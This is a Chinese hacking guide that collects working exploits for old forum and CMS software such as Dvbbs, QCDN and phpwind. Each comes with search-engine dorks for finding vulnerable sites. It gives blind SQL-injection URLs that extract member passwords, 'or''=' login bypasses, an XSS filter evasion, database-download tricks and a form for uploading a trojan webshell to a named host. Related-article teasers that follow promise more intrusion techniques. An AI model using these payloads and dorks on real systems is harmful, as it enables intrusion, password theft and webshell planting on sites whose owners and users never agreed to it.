老兵新传-各种漏洞的利用和一些搜索参数_漏洞研究

各种漏洞的利用和一些搜索参数  

说到漏洞,首先应该提到的就是动网的上传漏洞了。  

"洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上  

传漏洞接踵而来!  

asp动网论坛漏洞分析  

1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javasx63ript:window.open(‘httx70://www.fwcn.com','')[/img] 很清楚地看到,#x63解码的字母是"c",#x70解码的字母是"p",&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。  

2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request("name")),数据库的查询的语句是: sql="select * from [user] where username='"&username&"'",看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword="******",理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20'1'='1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql="select * from [User] where username='abc' and len(UserPassword)=5 and '1'='1'",现在明白点了吧,%20是空格,abc后面的单引号和'1'='1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)='a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>'50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,靠几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛(包括一个小有名气的flash站点)  

3 、动网SQL语句漏洞  

此漏洞针对动网SQL版本。  

测试方法:在http://ip/bbs/admin_index.asp 输入用户名是'or''=' 密码也是这个  

这样可以跳过认证  

原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。  

此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞  

4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下)  

上传漏洞路径:reg_upload.asp及upfile.asp  

  

青创文章系统  

打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的)  

青创文章系统  

上传漏洞。在网址后加/admin_upfile.asp 如果出现。  

Microsoft VBScript 磅︽顶琿岿粇 岿粇 '800a01b6'  

ンぃや穿妮┦┪よ猭: 'form'  

/article/admin_upfile.asp, 21  

就代表已经有90%以上的希望了  

桂林老兵的上传工具上传木马  

入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊  

青创文章管理系统注入功击  

关键字"list.asp?unid="  

工具:  

  1、NBSI好像大部分黑客站点都有得下。  

  2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用)  

第一次检测的时候,会报告"暂未检测到注入漏洞";然后在"特征字符"输入"Unid"  

(提示:"Unid"中的" U "一定要是大写的  

  

"飞龙文章管理系统" 漏洞  

飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用  

搜索"Article.asp?ArtID="关键字  

漏洞文件在  

admin_upfile.asp  

user_upfile.asp  

这两个文件"upfile.asp"  

动网漏洞的再现  

上传时cookie中加"ArtID=1111;"  

  

phpwind 1.3.6 的论坛漏洞的利用  

搜索关键字"POWER BY PHPWIND v1.3.6"  

phpwind1.3.6论坛利用程序 "群共享"中有上传  

保存后,木马地址为当前目录下的faq.php  

在本机用如下表单进行提交:  

<form ENCTYPE="multipart/form-data" ACTION="http://1717t.78cm.com/faq.php"  

METHOD="POST">  

<input NAME="MyFile" TYPE="file">  

<input VALUE=" 提交 " TYPE="submit">  

</form>  

上传成功后的木马存在论坛目录下  

直接访问就行!  

  

漏洞集合  

1)Co Net MiB Ver1.0~4.0 用'or'='or'登陆管理员(一个比较经典的漏洞)  

2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存)  

3)六合彩漏洞 我们打开www.baidu.com或是www.google.com  

在搜索里输入 请各位验证会员料  

http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc  

<%DBPath=Server.MapPath("wz520#.mdb")  

Set conn=Server.CreateObject("ADODB.Connection")  

conn.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ="&DBPath%>  

wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了  

4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL  

百度搜索 Powered by:QCDN_NEWS 台湾.tw qcdn。  

还可以用%5c暴库,通杀  

"list.asp?unid=" " .tw/list.asp?unid= " 存在注入 在"特征字符"输入"Unid"  

("Unid"中的" U "一定要是大写的)  

5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马  

E时代驿站漏洞  

百度搜索"E时代驿站"  

漏洞利用页面 /upload.asp 用老兵直接上传  

沸腾新闻系统上传漏洞  

搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用  

漏洞:没有对空格进行严格的限制。  

所以,我们直接选定要上传的asp木马,然后在后面加上空格  

它的上传文件是UploadFaceOK.asp  

时间: 2024-10-10 01:28:44

老兵新传-各种漏洞的利用和一些搜索参数_漏洞研究的相关文章

一些收集到的经典漏洞详解第1/2页_漏洞研究

☆carbo.dll☆   iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,  这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).   攻击方法:   提交这样的http请求 :   http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog   http会做如下回

三则黑客的Google搜索技巧_漏洞研究

     大家都知道,Google毫无疑问是当今世界上最强大的搜索引擎.然而,在黑客手中,它也是一个秘密武器,它能搜索到一些你意想不到的信息.赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站,而是利用这些技巧去在浩如烟海的网络信息中,来个大海捞针,寻找到对您有用的信息.  如果您是一名普通网民,您可以使用黑客的技巧扩大自己的视野,提高自己的检索效率:如果您是一名网管,请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施,如果没有就赶快来个亡羊补牢,毕竟隐患胜于明火,防范胜于救

用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒_漏洞研究

服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径.现在著名的腾讯QQ又被列入了这些捷径名单好在QQ并不是服务器必备的软件之一所以相信不会造成大范围的危机.文中遇到特殊情况虽然不多但大家还是应该遵照"可能的就应该防范"的原则做出相应防御. 一.在Windows2003中得到的webshell 此次渗透的目标是一台OA办公系统服务器.其操作系统新近升级到了Windows2003但OA仍存在asp文件上传漏洞所以webshell的取得并没有任何悬念. 阻碍是在权限提升时遇到的

文件上传漏洞在惠信中的应用_漏洞研究

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!  惠信新闻系统3.1 windows2000+sp4  先看这句代码.admin_uploadfilesave.asp  ...............  Server.mappath(formPath&file.FileName)  ............................  保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因

另类PHP安全漏洞:利用弱类型和对象注入进行SQLi

本文讲的是另类PHP安全漏洞:利用弱类型和对象注入进行SQLi,最近,我在一个目标中寻找漏洞时,遇到了一个正在运行Expression Engine(一个CMS平台)的主机. 这个特殊的应用程序吸引了我,因为当我尝试使用 "admin" 为用户名登录该应用程序时,服务器响应的cookie中包含了PHP序列化数据. 如我们之前所说过的,反序列化用户提供的数据可能导致意外的结果; 在某些情况下,甚至会导致代码执行. 于是,我决定仔细检查一下,而不是盲目的去测试,先看看我能否可以下载到这个C

以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用

本文讲的是以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用, 在本文中,我将介绍JEB的MIPS反编译器是如何帮助你查找和利用嵌入式设备中的软件漏洞. DVRF DVRF(Damn_Vulnerable_Router_Firmware) 是一个基于路由器Linksys E1550的路由器固件,里面包含了开发者写的一些存在漏洞的二进制文件,可以在路由器中安装该固件进行安全测试. DVRF模拟了一个比较真实的环境,比较适合初学路由器漏洞挖掘,不过前提是对其他CPU架构(MIPS)有一个基本的了

Windows Lnk远程代码执行漏洞(CVE-2017-8464)利用测试

本文讲的是Windows Lnk远程代码执行漏洞(CVE-2017-8464)利用测试,北京时间6月14日凌晨,微软发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘.网络共享等途径触发漏洞,完全控制用户系统,安全风险高危. 该漏洞的原理同2010年据称美国和以色列入侵并破坏伊朗核设施的震网行动中所使用的震网病毒(Stuxnet)非常相似,所以也被一些人称为"震网三代". 然而,通过百度搜索关键词&

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务

phpwind管理权限泄露漏洞利用程序发布_漏洞研究

漏洞发布:http://www.80sec.com/  漏洞作者:jianxin@80sec.com  漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本  漏洞危害:高  漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作  利用方式:http://www.80sec.com有提供exploit  漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导